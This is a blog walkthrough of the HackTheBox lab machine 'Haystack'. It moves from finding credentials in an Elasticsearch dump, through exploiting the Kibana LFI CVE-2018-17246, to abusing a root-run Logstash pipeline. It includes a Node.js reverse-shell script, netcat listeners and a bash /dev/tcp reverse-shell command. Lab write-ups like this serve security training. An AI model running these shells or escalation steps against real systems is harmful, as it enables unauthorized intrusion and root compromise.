Thumbnail: gravatar

Finding the Needle in the Haystack

by on under writeups
15 minute read


Finding the Needle in the Haystack


A Simple walkthrough for Haystack on HTB


Host Information    
Hostname Operating System HTB Difficulty Rating
Haystack Linux Easy


view all writeups here





We start off, as always, with our initial nmap scan, which results in the following report:

Nmap scan report for
Host is up (0.61s latency).
Not shown: 997 filtered ports
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
|   256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_  256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    nginx 1.12.2
| http-methods: 
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 81.58 seconds</code>


further enumeration on http

Seeing that port 80 is open, let’s browse to the IP in a browser. This leads to a page with a single image. Let’s download using wget to check out if it has any clues. Based on the name of the box (and the implication of needle in a haystack,) I get the impression that some of this may be very CTF-like.


running strings on the file yields the last line as a base64 string. Decode using:

echo bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg== | base64 -d 

which decoded to la aguja en el pajar es “clave”. Translating from Spanish to English shows: the needle in the haystack is “key”.

Interesting, CTF-like indeed.

I then ran dirb scan with the common wordlist, but it only yielded index.html. Alright, time to move on to something else.


searching for the needle in elasticsearch

Going back to the port listing from nmap, looks like 9200 is open, which is an elasticsearch instance. After some quick browsing on URIs on the instance that are available, we see a URI with _search at the end. Upon going to the URI in a broswer, it seems to give a fair bit of records in the browser page. Both viewing the results in a browser, as well as wget’ing the page showed a number of records dumped, but after spending a fair amount of time searching them, they didn’t seem to be of any use to gain a foothold in the system, nor to the best that I could tell, contained knowledge on how to later privesc.

After a bit more searching I noticed there is a _/sqldump option URI on the site. While that itself didn’t provide anything new, (without knowing proper elasticsearch query syntax) it gave me the strong impression that I needed to dump the database. At first I thought I had done just that, but then realized that the records were probably truncated/cut off to a certain amount that were served under the _ page. Some googling seemed to confirm this.

After some searching on the proper syntax to query and dump elasticsearch repositories, I decided I was spending too much time on this particular avenue, and proceeded to download a tool on github called elasticdump.

Usage of the tool was simple enough, running the following was able to dump the contents of the elasticsearch database:

./bin/elasticdump --input= --output=/home/initinfosec/writeups/haystack_HTB/loot/db.dmp


initial foothold & user access

Upon searching through dump.db, it revealed more records than were visible through the initial web/URI method I was using earlier, so my hunch was confirmed. I noticed spanish text in here, which reminded me of the original hint in the image which was in Spanish. Searching for “clave” for key (again - very CTF-ish) i noticed two occurances, both of which were base64:

cat db.dmp | grep -i clave                                                                                                                           
{"_index":"quotes","_type":"quote","_id":"111","_score":1,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}
{"_index":"quotes","_type":"quote","_id":"45","_score":1,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}}

Decoding both of those base64 encoded strings (with a simple echo "base64 encoded text" | base64 -d) gave me the user “security” and the password “” to login in via SSH.

Test the credentials out, and they work. Great, we have an initial foothold. Oh, and this box’s language is set to Spanish - ¡divertido!

Let’s go ahead and grab the user.txt from /home/security before we move on.


PrivEsc Enumeration

Now that we have an initial foothold into the box, we’ll need to do further enumeration for a way to escalate privileges and move across the system.


World writable directories


We’ll start with searching for world-writeable directories, in case we need to write a file for an exploit:

[security@haystack share]$ find / -writable -type d 2>/dev/null 



further enumeration for internal connections, services, and configs


We can also see what ports are listening from the perspective of the host. In this box ss has replaced the (now technically deprecated) netstat:

[security@haystack ~]$ ss -4 -ln
Netid State      Recv-Q Send-Q Local Address:Port               Peer Address:Port              
udp   UNCONN     0      0                      *:*                  
tcp   LISTEN     0      128          *:80                       *:*                  
tcp   LISTEN     0      128          *:9200                     *:*                  
tcp   LISTEN     0      128          *:22                       *:*                  
tcp   LISTEN     0      128                     *:*                  

Now ports 22, 80, and 9200 are no surprise, but TCP port 5601 is new to us. A quick Google query will tell us that this is port is associated with the Kibana application. This is likely telling that the entire ELK stack is implemented (Elasticsearch, Logstash, Kibana) - it seems clear that the CTF-like start has now moved to a more realistic/real-world system implementation.


Port forwarding & leveraging kibana for further exploitation


The other thing that is key to note here, is that the service is only accessible internally, through localhost, meaning if we want to browse/utilize the kibana application through a browser, we will have to make it appear as if we are doing it locally from the ‘haystack’ system.

If we wanted to, we could further drill down and confirm that the kibana service is running and take a look at the config files. A quick google will tell us that kibana leverages .yml files to direct a lot of it’s config.

First we can run ps and grep for the kibana process to confirm it’s running on the system:

[security@haystack ~]$ ps -ef | grep kibana
kibana     6355      1  0 12:43 ?        00:01:35 /usr/share/kibana/bin/../node/bin/node --no-warnings /usr/share/kibana/bin/../src/cli -c /etc/kibana/kibana.yml
security  19660  16911  0 18:42 pts/0    00:00:00 grep --color=auto kibana
[security@haystack ~]$ 


So we know it’s running, and it also appears that it’s pulling the config from /etc/kibana/kibana.yml. We could have also run the following to search for yml files that on the haystack host:

[security@haystack ~]$ find / -name *.yml 2> /dev/null

This will return a lot more results as well, but we notice that both kibana and logstash have .yml config file. (This also confirms the entire ELK stack is installed on the system.) Looking at a portion of the config file confirms the service is set to run on localhost port 5601:

[security@haystack ~]$ cat /etc/kibana/kibana.yml
# Kibana is served by a back end server. This setting specifies the port to use.
server.port: 5601

# Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
# The default is 'localhost', which usually means remote machines will not be able to connect.
# To allow connections from remote users, set this parameter to a non-loopback address. ""


# The URL of the Elasticsearch instance to use for all your queries.
elasticsearch.url: "http://localhost:9200"

The obvious solution here would be port forwarding. Luckily, we have ssh running, and are logged into the remote system, we can utilize ssh to port forward, as it’s somewhat of a “swiss army knife” of tools for remote connection and adminstration.

Now, if you did it right, you should be able to use either remote or local forwarding, as long as your understanding of the persepctive of local and remote (both from your local system you’re assessing and running your tooling on, as well as from the haystack system) is correct.

After some thinking about it and fiddling, we can use the following, run from our local (attacker) system Remember that when running this command, we will have to enter the ssh credentials for the ‘security’ user that we found earlier. It may take a minute to prompt, and once you enter the creds, the prompt may just sit there.

╰─➤  ssh -L 5601: security@ -N
security@'s password: 

This should send any local traffiic bound for port 5601 on localhost to the remote system on that same port using the ssh utility. The -N flag tells ssh not to execute a remote command, just to port forward.

Make sure to keep this terminal window open, and don’t Cntrl+C out of the command running, as well need the port forward for a good bit going forward. It’s best to open a new tab, or open a new terminal window, and leave this running in the background.

OK, from here we can test connectivity and confirm we setup port forwarding correctly:

 ss -an | grep 5601
u_seq             ESTAB                  0                   0                                                                    * 156009                    * 156010                                                                          
u_seq             ESTAB                  0                   0                                                                    * 156010                    * 156009                                                                          
tcp               LISTEN                 0                   128                                                      *                                                                               
tcp               LISTEN                 0                   128                                                              [::1]:5601                   [::]:*                                                                               

OK, so 5601 is open and listening, let’s go to and confirm that kibana shows in our local (attacker) browser:


Exploiting Kibana

Great, so we can access Kibana. Now we need to see how we can exploit Kibana to further our access on the system. Some cursory searching shows that there’s a pretty well-known LFI (Local File Inclusion) vulnerability, CVE-2018-17246, that will allow you to do directory traversal and access parts of the filesystem outside of the kibana application itself.

Great, so we should be able to use one of the word-writable directories we found earlier, to create a file containing a reverse_tcp payload. When reading the ELK documentation earlier, it looked like there was support for js, so let’s go ahead and write a file called shell.js on the remote haystack system we are ssh’d into. Here’s a good simple js shell PoC I found and used.

We’ll use the /dev/shm directory, so after copying the PoC to my clipboard, I pasted it using vim:

[security@haystack shm]$ vim shell.js
[security@haystack shm]$ cat shell.js 
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "<VPN IP>", function(){
    return /a/; // Prevents the Node.js application form crashing
[security@haystack shm]$ 


Great, that transferred, now let’s start a local listener on port 8080 to try and catch our reverse tcp shell:

nc -lvnp 8080

This netcat command as written above will listen on all interfaces, so we should be good. Now that the listener is set up, let’s try to use the URI in the LFI to access and run the shell.js resource. If we are successful, we will probably be dropped in as the kibana user, as the site is being served by the kibana user. Let’s check it out:
Connection from

Awesome, we got a shell as the kibana user. Making progress! We quickly realize that our shell kinda sucks, so let’s go ahead and make sure we have python on the remote system, and if so, upgrade the shell using a handy python command:

which python

Great, now:

/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'


Privilege Escalation & Gaining Root

Great. Now we need to do further digging to figure out how to get root.

I have a hunch that we will need to traverse or use the entire ELK stack for this box, and we’ve already utilized both ElasticSearch and Kibana. Let’s check out what Logstash has to offer - if this ends up being a dead end, we’ll continue with more enumeration in other areas.

First, we can confirm logstash is running on the system, with a ps -ef | grep logstash command. It does appear to be running, wrapped in a complex java argument. We can at least somewhwat confirm our suspicions of being able to exploit logstash to gain root by checking to see if a logstash process is running with root privileges. If not, we’ll have to take another avenue.

From the haystack user shell:

ps -elf|grep root|grep logstash

Great, the same logstash process we saw earlier returned, confirming logstash is running with root privileges. Looks like this might indeed be our path to a root shell.

Let’s continue.

Recall also that there was a logstash.yml file in /etc/logstash found in our earlier enumeration. Let’s see what’s in that directory:

cd /etc/logstash
ls -ltr
total 40
-rw-r--r--. 1 root   kibana  285 sep 26  2018 pipelines.yml
-rw-r--r--. 1 root   kibana 8164 sep 26  2018 logstash.yml.rpmnew
-rw-r--r--. 1 root   kibana  342 sep 26  2018 logstash-sample.conf
-rw-r--r--. 1 root   kibana 4466 sep 26  2018
-rw-r--r--. 1 root   kibana 1850 nov 28  2018 jvm.options
-rw-------. 1 kibana kibana 1725 dic 10  2018 startup.options
-rw-r--r--. 1 root   kibana 8192 ene 23  2019 logstash.yml
drwxrwxr-x. 2 root   kibana   62 jun 24 08:12 conf.d

Interesting, let’s check out the .yml file first, then the conf.d directory.

So the yaml file has a fair bit of information, some of which may or may not be of note.

# ------------ Data path ------------------
# Which directory should be used by logstash and its plugins
# for any persistent needs. Defaults to LOGSTASH_HOME/data
# /var/lib/logstash

Good to know how logstash is configured, but not sure that’s of use at the moment. Let’s check out the conf.d directory:

cd conf.d
ls -ltr
total 12
-rw-r-----. 1 root kibana 131 jun 20 10:59 filter.conf
-rw-r-----. 1 root kibana 186 jun 24 08:12 input.conf
-rw-r-----. 1 root kibana 109 jun 24 08:12 output.conf

cat input.conf
input {
	file {
		path => "/opt/kibana/logstash_*"
		start_position => "beginning"
		sincedb_path => "/dev/null"
		stat_interval => "10 second"
		type => "execute"
		mode => "read"

Leveraging Logstash to gain root


Now that’s interesting, looks like logstash can take input in the /opt/kibana/ directory with a logstash_ prefix.

Could we potentially leverage this to get arbitrary code execution from a file that would not normally be executed or ingested by logstash?

Seems an intriguing possibility. Let’s check out the filter.conf file to see if we get any idea of the syntax or format a file would need in order to be processed by logstash:

bash-4.2$ cat /etc/logstash/conf.d/filter.conf
cat /etc/logstash/conf.d/filter.conf
filter {
	if [type] == "execute" {
		grok {
			match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }

Hmm, so this gives us a good idea to play with, but will take some tweaking. Also a good reminder from the conf file, that our command syntax will need to be in Spanish. Some quick reading on logstash shows that grok is a language that logstash uses for filtering, expression matching, etc. So it looks like if our syntax matches Ejecutar comando: some_command, an abritrary command just might run. From reading a bit on logstash earlier, it also seems that the logs are ingested and processed on a fixed schedule (e.g. every 2 minutes), so it may take a moment to see any results.

Let’s go ahead and see if we can run a reverse tcp shell command from logstash. Let’s go ahead and open a listener on our local system on a port to catch the shell, if one spawns.

sudo nc -lnvp 1234

OK, now we’ll want to create a file to be ingested in /opt/kibana with the logstash_ prefix. Let’s go ahead and do that with on haystack system we have the security user logon for. The output in the haystack user shell looks like this:

bash-4.2$ echo "Ejecutar  comando: bash -i >& /dev/tcp/ 0>&1" > /opt/kibana/logstash_1.txt     
<p/ 0>&1" > /opt/kibana/logstash_1.txt                       

After about 2 minutes, when logstash processes the file, boom, we get a root shell!

Connection from
bash: no hay control de trabajos en este shell
[root@haystack /]# 

Fantastic. from here we can grab the root flag at /root/root.txt.

And we’re done.




hackthebox, HTB, writeups, walkthrough, hacking, pentest, OSCP prep
comments powered by Disqus